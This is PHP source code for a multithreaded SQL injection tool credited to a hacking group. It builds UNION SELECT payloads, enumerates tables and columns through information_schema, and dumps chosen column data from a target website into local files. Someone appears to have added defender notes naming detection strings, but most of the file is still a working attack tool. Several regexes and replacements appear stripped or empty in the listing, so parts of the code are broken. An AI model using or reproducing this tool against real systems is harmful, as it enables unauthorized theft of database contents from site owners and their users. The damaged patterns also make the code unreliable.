|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/
 --------------------------------------------------------------------------
 * Multithreaded SQL Injector
 * Coded by Miyachung
 * Miyachung@hotmail.com
 * Special Thanks burtay
 * Janissaries.Org
 * Youtube Channel -> http://www.youtube.com/JanissariesOrg
 * Usage -> https://www.youtube.com/watch?v=pytxxNnDWEU
 * Dump show -> https://www.youtube.com/watch?v=TvCvtgKn6Rg
 ***************************************************************************/

/*
 * Interactive command-line script. It reads a target URL, a column count and
 * the position of the column that echoes into the page from STDIN, then sends
 * UNION-based SELECT requests to that URL and scrapes the response body for
 * marker tags (see the regexes below). Rows are written under ./dumps/.
 *
 * Defender notes (all derived from what this file does):
 *  - Every request carries the literal query-string fragment
 *    "+and+1=0+union+select+", usually followed by
 *    "+from+information_schema.tables" / "+from+information_schema.columns"
 *    and "+limit+N,1--". These substrings are simple WAF / IDS matches.
 *  - Results are located by closing marker tags in the HTTP response:
 *    </v3rsion>, </d4tabase>, </t4blecount>, </t4bles>, </c0lumnscount>,
 *    </c0lumns>, </miyacount>, </dumped>. Seeing them in an outbound
 *    response body is a direct exfiltration signal.
 *  - The application-side root cause is unparameterized SQL; prepared
 *    statements remove the injection point that this script depends on.
 *
 * NOTE(review): several patterns read as empty or as identity replacements
 * as rendered here (e.g. preg_match('##si', ...), __hexEncode(""),
 * __replace()). That looks like HTML rendering stripped tag-like text from
 * the listing; confirm against the original file before relying on them.
 */

set_time_limit(0);                       // interactive session, no execution-time cap
if(!is_dir("dumps")){mkdir("dumps");}   // dump files go under ./dumps (mkdir result unchecked)

// --- operator input -------------------------------------------------------
echo "[+]Enter website: ";
$site = fgets(STDIN);
$site = str_replace("\r\n","",$site);
$site = trim($site);
if(!$site) exit("\n[-]Where is the website!");
// only the substring "http" is checked, so an "https://" URL passes unchanged
if(!preg_match('#http#',$site)) $site = "http://".$site;
echo "[+]Enter column number: ";
$colons = fgets(STDIN);                  // total number of columns in the UNION
$colons = str_replace("\r\n","",$colons);
$colons = trim($colons);
if(!$colons) exit("\n[-]Where is the columns!");
echo "[+]Enter effected column: ";
$effected = fgets(STDIN);                // 1-based position of the column that is reflected
$effected = str_replace("\r\n","",$effected);
$effected = trim($effected);
if(!$effected) exit("\n[-]Where is the effected column!");
echo "[+]Advanced SQL Injecter\n";
echo "[+]Coded by Miyachung || Janissaries.Org\n";

// --- version() probe ------------------------------------------------------
$version_url = __make_SQL_URL($site,$colons,$effected,FALSE,TRUE,"",__hexEncode(""),__hexEncode(""),"version()");
$version_page = fetch($version_url);
// two server-side responses are treated as fatal everywhere in this script
if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$version_page))
{
    exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
}
elseif(preg_match("#403 Forbidden#si",$version_page))
{
    exit("[-]Fail -> 403 Forbidden\n");
}
$version_page = __replace($version_page);
if(preg_match('##si',$version_page))     // NOTE(review): empty pattern as rendered, always matches
{
    preg_match("/(.*?)<\/v3rsion>/si",$version_page,$version);
    echo "[+]Version -> ".strip_tags($version[1])."\n";
}
else
{
    exit("[-]Version not found\n");
}

// --- database() probe -----------------------------------------------------
$database_url = __make_SQL_URL($site,$colons,$effected,FALSE,TRUE,"",__hexEncode(""),__hexEncode(""),"database()");
$database_page = fetch($database_url);
if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$database_page))
{
    exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
}
elseif(preg_match("#403 Forbidden#si",$database_page))
{
    exit("[-]Fail -> 403 Forbidden\n");
}
$database_page = __replace($database_page);
if(preg_match('##si',$database_page))    // NOTE(review): empty pattern as rendered, always matches
{
    preg_match("/(.*?)<\/d4tabase>/si",$database_page,$database);
    echo "[+]Database -> ".strip_tags($database[1])."\n";
}
else
{
    echo "[-]Database not found\n";
}
// only a version string whose first character is '5' passes this check
if(substr($version[1],0,1) == 5)
{
    echo "[+]Version >= 5 getting tables,using information_schema.tables\n";
}else{exit("[-]Version < 5 , sorry can't get the tables");}

// --- table enumeration via information_schema.tables ---------------------
$table_counturl = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.tables+where+table_schema=database()",TRUE,"",__hexEncode(""),__hexEncode(""),"count(table_name)");
$table_countpage = fetch($table_counturl);
$table_countpage = __replace($table_countpage);
preg_match("/(.*?)<\/t4blecount>/si",$table_countpage,$table_counted);
if($table_counted[1] == null)
{
    exit("[-]Tables not found\n");
}
echo "[+]Total tables -> ".$table_counted[1]."\n";
// one URL per table row (LIMIT offset = $xz); fetched in parallel below
for($xz=0;$xz<$table_counted[1];$xz++)
{
    $table_url[] = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.tables+where+table_schema=database()",TRUE,$xz,__hexEncode(""),__hexEncode(""),"table_name");
    // (an earlier per-URL sequential fetch/parse loop was left commented out
    //  here in the original; it is superseded by the __threading call below)
}
$tbls = __threading($table_url,10,"/(.*?)<\/t4bles>/si",FALSE,FALSE);

table_again:
echo "\n";
$tbls = array_values(array_unique(array_filter($tbls)));
if(empty($tbls))
{
    exit("[-]Can't get tables\n");
}
foreach($tbls as $tid => $tbl)
{
    echo "[$tid]$tbl\n";
}
echo "\n[+]Choose a table for get columns,just type number (exit): ";
$choose = fgets(STDIN);
$choose = str_replace("\r\n","",$choose);
$choose = trim($choose);
if($choose == "exit")
{
    exit("\n");
}
// NOTE(review): $selected comes from the remote response body and is
// interpolated unescaped into later query strings and into the dump path.
$selected = $tbls[$choose];

// --- column enumeration for the chosen table ------------------------------
$column_counturl = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.columns+where+table_name=0x".__hexEncode($selected)."",TRUE,"",__hexEncode(""),__hexEncode(""),"count(column_name)");
$column_countpage = fetch($column_counturl);
$column_countpage = __replace($column_countpage);
preg_match("/(.*?)<\/c0lumnscount>/si",$column_countpage,$column_counted);
if($column_counted[1] == null || $column_counted[1] == 0)
{
    echo "[-]Columns not found\n";
    goto table_again;
}
echo "[+]Total columns for $selected -> ".$column_counted[1]."\n";
for($xc=0;$xc<$column_counted[1];$xc++)
{
    $column_url[] = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.columns+where+table_name=0x".__hexEncode($selected)."",TRUE,$xc,__hexEncode(""),__hexEncode(""),"column_name");
    // (sequential fetch/parse loop left commented out in the original;
    //  superseded by the __threading call below)
}
$cols = __threading($column_url,5,"/(.*?)<\/c0lumns>/si",FALSE,FALSE);

col_showagain:
echo "\n";
$cols = array_values(array_unique(array_filter($cols)));
foreach($cols as $cid => $colname)
{
    echo "[$cid]$colname\n";
}

what_again:
echo "\n[+]What do you wanna do (dump,back,exit): ";
$whatdo = fgets(STDIN);
$whatdo = str_replace("\r\n","",$whatdo);
$whatdo = trim($whatdo);
if($whatdo == "dump")
{
    col_ask:
    echo "[+]Select dump column 1,just type number(back,exit): ";
    $select_col1 = fgets(STDIN);
    $select_col1 = str_replace("\r\n","",$select_col1);
    $select_col1 = trim($select_col1);
    if($select_col1 == "back")
    {
        goto col_showagain;
    }
    elseif($select_col1 == "exit")
    {
        exit("\n");
    }
    echo "[+]Select dump column 2,type number(if you don't want just enter,back,exit): ";
    $select_col2 = fgets(STDIN);
    $select_col2 = str_replace("\r\n","",$select_col2);
    $select_col2 = trim($select_col2);
    if($select_col2 == "back")
    {
        goto col_ask;
    }
    elseif($select_col2 == "exit")
    {
        exit("\n");
    }
    elseif(!empty($select_col2))
    {
        $column2 = $cols[$select_col2];   // optional second column, joined with 0x3a (':') below
    }
    $column1 = $cols[$select_col1];
    // row count for the first column decides how many LIMIT-offset URLs are built
    $count_url = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,"",__hexEncode(""),__hexEncode(""),"count($column1)");
    $count_page = fetch($count_url);
    $count_page = __replace($count_page);
    preg_match("/(.*?)<\/miyacount>/si",$count_page,$datacount);
    if(trim($datacount[1]) == null || $datacount[1] == 0)
    {
        echo "[-]Columns empty\n";
        goto col_showagain;
    }
    echo "[+]Total datas -> ".$datacount[1]."\n";
    echo "[+]Using LIMIT NULL,1 for dump\n\n";
    for($x=0;$x<=$datacount[1];$x++)
    {
        if($column2)
        {
            $dump_url[] = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,$x,__hexEncode(""),__hexEncode(""),"$column1,0x3a,$column2");
            // NOTE(review): the local file name is built from remote-supplied column names
            $filename = "dumps/".__parse($site).",$column1"."_"."$column2.txt";
        }
        else
        {
            $dump_url[] = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,$x,__hexEncode(""),__hexEncode(""),"$column1");
            $filename = "dumps/".__parse($site).",$column1.txt";
        }
        // (sequential fetch/print/__dumpsave loop left commented out in the
        //  original; superseded by the __threading call below)
    }
    // 20 or more rows: print and append to $filename; fewer: print only
    if($datacount[1] >= 20)
    {
        $dumps = __threading($dump_url,10,"/(.*?)<\/dumped>/si",TRUE,TRUE,$filename);
    }
    else
    {
        $dumps = __threading($dump_url,10,"/(.*?)<\/dumped>/si",TRUE,FALSE,"");
    }
    unset($column_url);
    unset($dump_url);
    goto col_showagain;
}
elseif($whatdo == "back")
{
    unset($column_url);
    unset($cols);
    goto table_again;
}
elseif($whatdo == "exit")
{
    exit("\n");
}
else
{
    echo "[-]Unknown command\n";
    goto what_again;
}

/**
 * Single blocking GET of $url via cURL with a 10 s timeout.
 *
 * Returns the response body as a string, or FALSE on transport failure
 * (curl_exec's return value is passed through unchanged). No headers,
 * User-Agent or TLS options are configured, and the handle is not closed.
 */
function fetch($url)
{
    $curl = curl_init();
    curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($curl,CURLOPT_URL,$url);
    curl_setopt($curl,CURLOPT_TIMEOUT,10);
    $oba = curl_exec($curl);
    return $oba;
}

/**
 * Builds the request URL for one UNION SELECT.
 *
 * @param string $site     base URL, used verbatim as the prefix
 * @param int    $colons   number of columns in the UNION (range(1,$colons))
 * @param int    $effected 1-based index of the column replaced by the
 *                         concat()/group_concat() expression
 * @param string $from     literal "+from+..." clause, or FALSE for none
 * @param bool   $concat   TRUE -> concat(), FALSE -> group_concat()
 * @param mixed  $limit    LIMIT offset; compared loosely with null, so
 *                         "" and 0 both mean "emit no LIMIT clause"
 * @param string $hex1     hex marker prepended inside the expression (0x$hex1)
 * @param string $hex2     hex marker appended inside the expression (0x$hex2)
 * @param string $what     SQL expression selected in the affected column
 * @return string the assembled URL, always ending in "--"
 */
function __make_SQL_URL($site,$colons,$effected,$from,$concat,$limit,$hex1,$hex2,$what)
{
    $colon_union = range(1,$colons);
    if($concat)
    {
        $colon_union[$effected-1] = "concat(0x$hex1,$what,0x$hex2)";
    }
    else
    {
        $colon_union[$effected-1] = "group_concat(0x$hex1,$what,0x$hex2)";
    }
    $colon_union = implode(",",$colon_union);
    if($from)
    {
        if($limit != null)
        {
            $url = $site."+and+1=0+union+select+".$colon_union.$from."+limit+$limit,1--";
        }else
        {
            $url = $site."+and+1=0+union+select+".$colon_union.$from."--";
        }
    }else{
        if($limit != null)
        {
            $url = $site."+and+1=0+union+select+".$colon_union."+limit+$limit,1--";
        }
        $url = $site."+and+1=0+union+select+".$colon_union."--";
    }
    return $url;
}

/**
 * Fetches $urls in parallel with curl_multi, $thread handles per batch, and
 * extracts capture group 1 of $regex from each response body.
 *
 * @param array  $urls   request URLs
 * @param int    $thread batch size for array_chunk()
 * @param string $regex  PCRE with one capture group applied to each body
 * @param bool   $yaz    TRUE: print each match that contains an
 *                       "alnum:alnum" pair and optionally save it;
 *                       FALSE: collect matches into the return array
 * @param bool   $kaydet TRUE (with non-null $file): append each printed
 *                       match plus "\r\n" to $file
 * @param string $file   output path used when $kaydet is TRUE
 * @return array|null collected matches when $yaz is FALSE; otherwise
 *                    $veriler is never assigned and null is returned
 *
 * The same two fatal response checks as in the top-level script are applied
 * to every body. The $curl array is not reset between batches.
 */
function __threading($urls,$thread,$regex,$yaz,$kaydet,$file=NULL)
{
    $init = curl_multi_init();
    $urls = array_chunk($urls,$thread);
    $x = 0;                               // running counter for printed rows
    foreach($urls as $url)
    {
        for($i=0;$i<=count($url)-1;$i++)
        {
            $curl[$i] = curl_init();
            curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1);
            curl_setopt($curl[$i],CURLOPT_URL,$url[$i]);
            curl_setopt($curl[$i],CURLOPT_TIMEOUT,10);
            curl_multi_add_handle($init,$curl[$i]);
        }
        // busy-poll the multi handle until no transfer is active
        do{curl_multi_exec($init,$active);usleep(11);}while($active>0);
        foreach($curl as $cid => $page)
        {
            $content[$cid] = curl_multi_getcontent($page);
            curl_multi_remove_handle($init,$page);
            if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$content[$cid]))
            {
                exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
            }
            elseif(preg_match("#403 Forbidden#si",$content[$cid]))
            {
                exit("[-]Fail -> 403 Forbidden\n");
            }
            preg_match($regex,$content[$cid],$veri);
            if($yaz == TRUE)
            {
                // only values shaped like "a:b" (the 0x3a-joined dump format) are printed
                if(!empty($veri[1]) && preg_match("/[a-zA-Z0-9]:[a-zA-Z0-9]/si",$veri[1]))
                {
                    $x++;
                    echo "[$x]$veri[1]\n";
                    ob_flush();flush();
                    if($kaydet == TRUE && $file != NULL)
                    {
                        $fopen = fopen($file,'ab');   // fopen result not checked
                        fwrite($fopen,trim($veri[1])."\r\n");
                        fclose($fopen);
                    }
                }
            }
            else
            {
                $veriler[] = $veri[1];
            }
        }
    }
    return $veriler;
}

/**
 * Hex-encodes $string one byte at a time with dechex(ord(byte)), no
 * separators and no zero padding of single-digit values.
 */
function __hexEncode($string)
{
    $hex='';
    for ($i=0; $i < strlen($string); $i++)
    {
        $hex .= dechex(ord($string[$i]));
    }
    return $hex;
}

/**
 * Response post-processing applied before the marker regexes.
 * NOTE(review): both replacements are identity operations as rendered here;
 * the search strings were most likely altered by HTML rendering of this
 * listing — confirm against the original file.
 */
function __replace($text)
{
    $text = str_replace("<","<",$text);
    $text = str_replace(">",">",$text);
    return $text;
}

/**
 * Appends $text to $file (binary append mode). Always returns true; the
 * fopen result is not checked.
 */
function __dumpsave($file,$text)
{
    $fp = fopen($file,'ab');
    fwrite($fp,$text);
    fclose($fp);
    return true;
}

/**
 * Returns the third "/"-separated segment of $site, i.e. the host part of a
 * "scheme://host/..." URL. Used only to name files under ./dumps.
 */
function __parse($site)
{
    $site = explode("/",$site);
    $site = $site[2];
    return $site;
}
?>